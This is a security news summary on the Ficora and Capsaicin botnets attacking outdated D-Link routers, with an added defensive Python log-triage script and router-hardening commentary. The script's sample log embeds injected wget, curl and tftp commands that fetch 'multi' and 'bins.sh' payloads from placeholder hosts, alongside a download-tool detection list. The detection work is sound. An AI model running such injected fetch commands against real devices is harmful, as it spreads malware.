Two botnets, Ficora and Capsaicin, have recently intensified their attacks on outdated and end-of-life D-Link routers by exploiting multiple known vulnerabilities, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
These malware variants specifically target popular D-Link models such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L, gaining initial access through weaknesses in the routers' management interface and executing malicious commands. After compromising a device, attackers use the access for data theft and launch distributed denial-of-service (DDoS) attacks.
Ficora is a modern offshoot of the Mirai botnet built to exploit D-Link devices. Its targeting is geographically broad, with notable surges of activity in Japan and the United States. Once inside, Ficora deploys a shell script named 'multi' that can download its payload using methods such as wget, curl, ftpget, and tftp. It also includes a brute-force mechanism with hard-coded credentials, enabling it to infect other Linux devices across different hardware architectures. For attack capabilities, Ficora supports UDP flooding, TCP flooding, and DNS amplification to boost the impact of its DDoS operations.
Capsaicin, a Kaiten botnet variant believed to be developed by the Keksec group, was observed in a concentrated burst of attacks mostly targeting East Asian countries over two days in October. Infection is initiated through a downloader script ("bins.sh") that fetches platform-specific binaries labeled with the 'yakuza' prefix. Aside from launching DDoS attacks, Capsaicin scans for other botnet payloads operating on the same device and disables them. It also collects host information and transmits it back to a command-and-control server.
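As an added example, not code from the article, the malware, or the researchers who analyzed it, the Python script below triages router management-interface access-log lines for the indicators the two paragraphs above describe: download attempts using wget, curl, ftpget or tftp, Ficora's 'multi' script, Capsaicin's 'bins.sh' downloader, and binaries carrying the 'yakuza' prefix. The Combined-Log-Format layout, the hosts, and the request paths in the sample lines are constructed assumptions; only the tool and script names come from the article. It goes slightly beyond the text by grouping suspected families per source address, which is the view a defender would want when deciding what to block.

```python
import re
from urllib.parse import unquote

# Indicators taken from the article's description of the two botnets.
DOWNLOAD_TOOLS = ("wget", "curl", "ftpget", "tftp")
FICORA_SCRIPT = "multi"        # shell script Ficora drops
CAPSAICIN_SCRIPT = "bins.sh"   # Capsaicin downloader script
CAPSAICIN_PREFIX = "yakuza"    # prefix on Capsaicin's per-platform binaries

# Constructed sample log (Combined Log Format). Addresses, timestamps and
# request paths are placeholders, not real infrastructure or real exploits.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 1043
198.51.100.23 - - [10/Oct/2024:03:14:09 +0000] "POST /cgi-bin/example.cgi?cmd=wget%20http%3A%2F%2F192.0.2.10%2Fmulti HTTP/1.1" 200 0
198.51.100.23 - - [10/Oct/2024:03:14:11 +0000] "GET /example?cmd=tftp%20-g%20-r%20multi%20192.0.2.10 HTTP/1.1" 200 0
192.0.2.55 - - [10/Oct/2024:03:15:30 +0000] "GET /example?cmd=curl%20-O%20http%3A%2F%2F192.0.2.44%2Fbins.sh HTTP/1.1" 200 0
192.0.2.55 - - [10/Oct/2024:03:15:41 +0000] "GET /example?cmd=chmod%20%2Bx%20yakuza.mips HTTP/1.1" 200 0
203.0.113.9 - - [10/Oct/2024:03:16:02 +0000] "GET /status.html HTTP/1.1" 200 512
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD target proto", status ...
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that separate tokens in a URL-decoded request target; splitting on
# shell metacharacters too means an injected command is tokenised the way a
# shell would see it, so "multi" is matched as a whole word, not inside
# "multimedia".
TOKEN_SPLIT_RE = re.compile(r'[\s;|&`$()/=?]+')


def classify_request(target: str) -> list:
    """Return the indicator names present in a raw (still URL-encoded) request target."""
    tokens = [t for t in TOKEN_SPLIT_RE.split(unquote(target).lower()) if t]
    hits = []
    if any(t in DOWNLOAD_TOOLS for t in tokens):
        hits.append("downloader")
    if FICORA_SCRIPT in tokens:
        hits.append("ficora-script")
    if CAPSAICIN_SCRIPT in tokens:
        hits.append("capsaicin-script")
    if any(t.startswith(CAPSAICIN_PREFIX) for t in tokens):
        hits.append("capsaicin-binary")
    return hits


def suspected_family(hits: list) -> str:
    """Map indicator hits to a family label; a bare downloader is a weak signal."""
    if "ficora-script" in hits:
        return "Ficora (suspected)"
    if "capsaicin-script" in hits or "capsaicin-binary" in hits:
        return "Capsaicin (suspected)"
    return "unknown (download tool in request)"


def scan_log(text: str) -> list:
    """Return one finding dict per log line that carries at least one indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash on malformed input
        hits = classify_request(m["target"])
        if hits:
            findings.append({
                "line": line_no,
                "src": m["src"],
                "family": suspected_family(hits),
                "indicators": hits,
            })
    return findings


def sources_by_family(findings: list) -> dict:
    """Group source addresses by suspected family, for a block/triage list."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["family"], set()).add(f["src"])
    return grouped


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line']:>2}  {f['src']:<15} {f['family']:<28} {', '.join(f['indicators'])}")
    for family, srcs in sources_by_family(results).items():
        print(f"{family}: {sorted(srcs)}")
```

On the constructed sample, lines 2 and 3 are attributed to Ficora and lines 4 and 5 to Capsaicin, while the two ordinary page requests produce no finding. Real deployments would feed the router's syslog or a reverse proxy's access log into `scan_log` and extend the indicator lists as new samples are analyzed.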
Source: https://www.bleepingcomputer.com/news/security/malware-botnets-exploit-outdated-d-link-routers-in-recent-attacks/
Commentary
Botnets are automated networks of compromised devices controlled by malicious actors to carry out tasks such as distributed denial-of-service attacks, data theft, and the spread of malware. Their operation typically relies on infecting internet-connected devices - often those with security flaws or outdated firmware - so attackers can remotely coordinate large-scale, disruptive campaigns.
D-Link devices, particularly Wi-Fi routers, are integral parts of many organizations' infrastructures, offering affordable and reliable connectivity options. As a major player in the global router market, D-Link holds a significant market share, with estimates in recent years showing their routers account for about 10 percent of worldwide unit shipments and revenue.
Their portfolio ranges from consumer-grade models to enterprise solutions, making them a trusted but sometimes vulnerable choice in the midst of growing digital transformation.
The prevalence of D-Link routers within organizations stems both from widespread adoption and from the expansion of wireless networks to support remote work, cloud services, and growing device counts. Unfortunately, this popularity has made D-Link units a frequent target for botnet operators.
Given evolving threats, organizations must prioritize firmware updates for all network hardware and replace end-of-life devices that no longer receive security patches. Strong, unique passwords for administrative access, disabling unnecessary remote management features, and considering alternative firmware where it is available are also important.
The final takeaway is that maintaining vigilance over router security and lifecycle is essential for mitigating the risk of botnet infection and safeguarding both organizational resources and sensitive data.
Additional Sources: https://www.kbvresearch.com/router-market/; https://www.cognitivemarketresearch.com/articles/which-are-the-top-manufacturing-companies-of-wi-fi-routers-market; https://www.globaldata.com/company-profile/d-link-corporation/
